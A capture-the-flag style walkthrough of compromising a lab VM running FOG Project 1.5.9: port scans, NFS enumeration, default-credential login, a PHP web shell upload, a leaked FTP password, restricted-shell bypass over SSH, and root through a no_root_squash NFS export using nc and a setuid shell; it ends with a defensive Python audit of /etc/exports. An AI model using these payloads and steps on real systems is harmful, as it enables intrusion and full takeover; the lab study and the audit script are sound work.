The IP of the target machine being attacked is 192.168.56.121

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.121
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:54 UTC
Nmap scan report for 192.168.56.121 (192.168.56.121)
Host is up (0.00010s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
38977/tcp open unknown
42677/tcp open unknown
51475/tcp open unknown
60049/tcp open unknown
MAC Address: 08:00:27:22:E0:5D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds
sudo nmap -sT -sV -sC -O -p21,22,80,111,443,2049,3306,38977,42677,51475,60049 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:55 UTC
Nmap scan report for 192.168.56.121 (192.168.56.121)
Host is up (0.00037s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 ee:01:82:dc:7a:00:0e:0e:fc:d9:08:ca:d8:7e:e5:2e (RSA)
| 256 44:af:47:d8:9f:ea:ae:3e:9f:aa:ec:1d:fb:22:aa:0f (ECDSA)
|_ 256 6a:fb:b4:13:64:df:6e:75:b2:b9:4e:f1:92:97:72:30 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 32792/udp mountd
| 100005 1,2,3 37729/tcp6 mountd
| 100005 1,2,3 51475/tcp mountd
| 100005 1,2,3 53279/udp6 mountd
| 100021 1,3,4 35971/udp nlockmgr
| 100021 1,3,4 37273/tcp6 nlockmgr
| 100021 1,3,4 38977/tcp nlockmgr
| 100021 1,3,4 60334/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
2049/tcp open nfs 3-4 (RPC #100003)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 89
| Capabilities flags: 63486
| Some Capabilities: SupportsLoadDataLocal, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, InteractiveClient, ConnectWithDatabase, Support41Auth, ODBCClient, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: YTy&N5^X"=NP'nu&Wcm{
|_ Auth Plugin Name: mysql_native_password
38977/tcp open nlockmgr 1-4 (RPC #100021)
42677/tcp open mountd 1-3 (RPC #100005)
51475/tcp open mountd 1-3 (RPC #100005)
60049/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:22:E0:5D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds

Information gathering

FTP does not allow anonymous login, so let's look at NFS

showmount -e 192.168.56.121
Export list for 192.168.56.121:
/images/dev *
/images *
sudo mkdir /tmp/kalinfs

sudo mount -t nfs 192.168.56.121:/images/dev /tmp/kalinfs

There are two fog files in there? I have never worked with them and don't know much about them, so I'll set them aside for now.

Getshell

Visiting port 80, the root is an Apache default page. A directory scan finds /fog, which is a FOG Project login page. After looking into it, FOG appears to be used for managing computer disk images, which should be the same thing as the files in the NFS share. An exploit for version 1.5.9 can be found, but it can only be used after logging in.

Trying FOG's default credentials fog:password works; the version shown on the settings page is indeed 1.5.9.

Try the exploit: /usr/share/exploitdb/exploits/php/webapps/49811.txt

dd if=/dev/zero of=myshell bs=10485760 count=1

echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

echo "http://192.168.56.102/myshell" | base64
aHR0cDovLzE5Mi4xNjguNTYuMTAyL215c2hlbGwK

When running the later step, install myshell.php, it errored:

Type: 1024, File: /var/www/html/fog/lib/fog/fogftp.class.php, Line: 219, Message: FTP connection failed, Host: 192.168.1.123, Username: fogproject

It seems some settings have been changed.

But under Storage, in DefaultMember, a credential can be found:

fogproject:84D1gia!8M9HSsR8gXau

Tried logging in over SSH, but it failed and returned:

ssh fogproject@192.168.56.121 -t /bin/sh

Using an sh environment bypasses it.

Privilege escalation

There are no other users, so I thought back to the NFS from earlier; the first thing that comes to mind is the classic no_root_squash.

cat /etc/exports

/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)

It is indeed enabled. The /images export is read-only, but /images/dev is writable, which is why the earlier mount had to be of the /images/dev directory.

In kali's /tmp directory:

nc -lvnp 1234 >root_sh

On the target:

cat  /bin/sh | nc 192.168.56.102 1234

In kali:

sudo cp /tmp/root_sh /tmp/kalinfs

sudo chmod +xs /tmp/kalinfs/root_sh

On the target:

./root_sh -p

Now we are root!
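The escalation above works only because the server exports a writable directory with no_root_squash to every host. The following is an added example, not part of the original writeup, that audits an /etc/exports file for exactly this class of misconfiguration: it parses the exports(5) syntax (path, then client(options) entries, with defaults of ro, secure and root_squash for anything not stated) and rates each export. The sample input is constructed from the two export lines quoted above plus a hardened variant of the writable export for comparison; the severity labels are this example's own convention.

```python
"""Audit NFS /etc/exports for options that let an NFS client gain root on the
server (added example, not from the original writeup)."""
import re
from dataclasses import dataclass

# Constructed sample: the two lines from the writeup's /etc/exports plus a
# hardened version of the writable export, restricted to one subnet and
# using the safe defaults (root_squash, secure).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)
/srv/hardened 192.168.56.0/24(rw,sync,root_squash,secure,no_subtree_check)
"""


@dataclass
class Export:
    path: str
    client: str
    options: set


def parse_exports(text):
    """Parse exports(5) syntax: one path per line followed by whitespace-separated
    client(options) entries. '#' starts a comment, a trailing backslash continues
    the line, and an entry without parentheses gets the server defaults
    (ro, sync, secure, root_squash), which this audit treats as safe."""
    exports = []
    text = text.replace("\\\n", " ")  # join continued lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # A path with no client list is exported to everyone.
        path, clients = fields[0], fields[1:] or ["*"]
        for entry in clients:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", entry)
            if m is None:
                raise ValueError(f"malformed export entry: {entry!r}")
            client = m.group(1) or "*"  # "(opts)" with no host also means every host
            opts = {o for o in (m.group(2) or "").split(",") if o}
            exports.append(Export(path, client, opts))
    return exports


def audit(exports):
    """Return (path, client, severity, message) tuples for risky exports.
    Severity reflects how directly the option set lets a client create a
    root-owned setuid file on the server."""
    findings = []
    for e in exports:
        writable = "rw" in e.options       # default is ro
        everyone = e.client == "*"
        if "no_root_squash" in e.options:  # default is root_squash
            sev = "critical" if writable else "high"
            msg = "no_root_squash: root on the client keeps uid 0 on this export"
            if writable:
                msg += " and can plant root-owned setuid files"
            findings.append((e.path, e.client, sev, msg))
        if "insecure" in e.options:        # default is secure
            findings.append((e.path, e.client, "medium",
                             "insecure: requests from ports above 1024 are accepted, "
                             "so any unprivileged user on a client can speak to the server"))
        if writable and everyone:
            findings.append((e.path, e.client, "medium",
                             "rw export to '*': every host that can reach the server may write here"))
    return findings


if __name__ == "__main__":
    for path, client, sev, msg in audit(parse_exports(SAMPLE_EXPORTS)):
        print(f"[{sev.upper():8}] {path} -> {client}: {msg}")
```

Run against a real server with `python3 audit_exports.py < /etc/exports` after swapping SAMPLE_EXPORTS for `sys.stdin.read()`; the /srv/hardened line shows the shape an export should take: an explicit client subnet instead of `*`, and root_squash and secure left at their defaults.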

Miscellaneous notes

Here I record a few pitfalls I ran into during privilege escalation:

1: At first I mounted /images instead of /images/dev, so I had no write permission.

2: The /bin/sh in kali is different from the one on the target, which leads to missing libraries.

3: On the target, do not copy the sh file to the mount point directly as the fogproject user; doing so makes it impossible to change its ownership to root in the end. Create the sh file in kali as root instead.